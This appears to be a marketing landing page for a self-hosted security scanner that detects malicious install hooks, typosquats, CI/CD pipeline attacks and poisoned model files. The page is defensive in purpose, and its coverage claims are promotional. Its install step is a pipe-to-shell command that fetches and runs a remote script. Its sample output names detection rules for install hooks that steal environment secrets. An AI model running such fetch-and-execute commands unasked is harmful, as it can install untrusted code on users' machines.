Self-hosted security platform · v0.1.0

The security scanner that never sees your code

SAST, dependencies, secrets, containers, IaC, DAST, Kubernetes, PII and AI/ML — plus the deepest supply-chain attack detection anywhere. One self-hosted binary. No SaaS, no upload, no account.

$ curl -fsSL https://goju.app/install.sh | sh Coming soon
macOS & Linux SHA-256 + minisign verified single static binary
See everything it scans → How it works
Your code stays on your machine No SaaS, no telemetry Signed releases Air-gap capable
One platform, every layer

The scanners your whole stack needs

goju replaces a drawer full of tools with one binary — your application code, your dependencies, your containers, your infrastructure and your AI systems, all scanned locally.

SAST

Your own code — Semgrep, gosec and optional LLM review.

Dependencies (SCA)

Known CVEs via Trivy, Grype, OSV — reachability-aware with govulncheck.

Secrets

Committed credentials in the tree and across git history (Gitleaks).

Supply-chain attacks

Malicious install hooks, typosquats, poisoned packages — the depth below.

Container images

Base-image CVEs in Dockerfiles and compose files (Trivy).

Infrastructure (IaC)

Terraform / cloud-config misconfiguration and posture.

DAST

Running-app testing, including API & authenticated scans (ZAP, Nuclei).

Kubernetes (KSPM)

Cluster posture — privileged containers, host namespaces, root, hostPath.

License policy

OSS license allow/deny governance with configurable severity.

PII & cardholder data

Luhn-checked PANs, SSN, IBAN in code, fixtures and configs (PCI scope).

AI / ML security

Malicious model artifacts, OWASP-LLM app flaws, model sourcing.

Compliance evidence

CRA, DORA, NIS2, SOC 2, GDPR, PCI — scored from your own scan data.

Where goju goes deepest

Supply-chain attacks vendor SaaS misses

CVE scanners tell you about yesterday's known vulnerabilities. goju also detects the actual compromise patterns — statically, before they reach a database.

Malicious install hooks

postinstall/preinstall scripts that exfiltrate credentials, fetch payloads or propagate worms — the Shai-Hulud / event-stream / ua-parser-js pattern, across 14 manifest formats.

behavior · BHV-*

Transitive worm propagation

Most scanners stop at your top-level manifest. goju walks node_modules, .venv and vendor/ and applies the same rules to every installed package — where the worm actually lives.

deep tree walk

Typosquats & homoglyphs

Damerau-Levenshtein edit-distance plus Cyrillic/Greek homoglyph detection across npm, PyPI, Go, Cargo and Composer. Catches lodahs, requets, Cyrillic-а-in-react.

typosquat · TSQ-*

Known-malicious versions

An embedded, offline database of historical supply-chain incidents — refreshed from OSV's GHSA-MAL feed. Works fully air-gapped, no lookup call required.

malpkg · offline DB

CI/CD pipeline attacks

Unpinned GitHub Actions, pull_request_target with checkout (the tj-actions pattern), script injection and secret exposure on PR triggers.

pipeline · GHA-*

New transitive deps

SBOM diff between scans catches the exact moment a malicious package silently joins your dependency tree — plus deps.dev reputation and provenance gaps.

sbomdiff · provenance
Built for what's next, and what's required

AI/ML security and regulatory evidence — in the box

AI/ML security

Most scanners use an LLM; goju also scans your AI systems. Real pickle-opcode disassembly over model artifacts, OWASP-LLM-Top-10 app flaws, and model-sourcing checks.

  • Malicious model artifacts — .pkl/.pt/.ckpt code-execution payloads
  • Prompt injection & insecure output handling (LLM01/LLM02)
  • Unpinned / typosquatted Hugging Face model references

Compliance, from real evidence

Scored framework reports built from your own scan data — not a questionnaire. Gaps, recommendations and reporting deadlines, with honest auto-coverage.

EU CRADORANIS2 SOC 2GDPRPCI-DSS
  • Reachability scoring cuts CVE noise to what's actually exploitable
  • Role cockpits — CEO, CTO, Dev-manager and Legal views

Runs entirely on your infrastructure

If you scan with a cloud vendor, you're uploading your dependency tree — and often your source — to a third party. goju is a single binary you run locally. Same job, in many cases deeper, without the upload.

  • No upload step. Source, lockfiles and findings never leave the box.
  • Air-gap capable. Embedded malicious-package and typosquat data; no internet required.
  • Signed, verifiable releases. Every build is minisign-signed and checked in-process.
  • Dashboard, CLI & CI gate. --fail-on-critical exits non-zero; SARIF/JSON out, plus auto-fix PRs.
goju supply-chain ./
# risk-ranked, no config needed
● event-stream@3.3.6 score 98
BHV-001 install hook exfiltrates env
MAL-003 known-malicious version
● reqeusts score 76
TSQ-002 typosquat of requests
● left-pad@1.0.0 score 41
LCK-004 no integrity hash

✓ 3 packages flagged · CWE + DORA tags
exit 2 (--fail-on-critical)

From zero to a CI gate in three commands

1

Install

One line, no dependencies. The built-in supply-chain scanners work with zero setup; external scanners are optional.

2

Scan

Point it at any project: goju supply-chain ./ — or goju scan --all for the full platform. No database, no account.

3

Gate & watch

Add --fail-on-critical in CI, or goju serve for the dashboard, scheduled scans and auto-scan on push.

goju 0.1.0 is launching soon

Single binary. Every layer of your stack. Your code never leaves your machine.

$ curl -fsSL https://goju.app/install.sh | sh Coming soon
Read the docs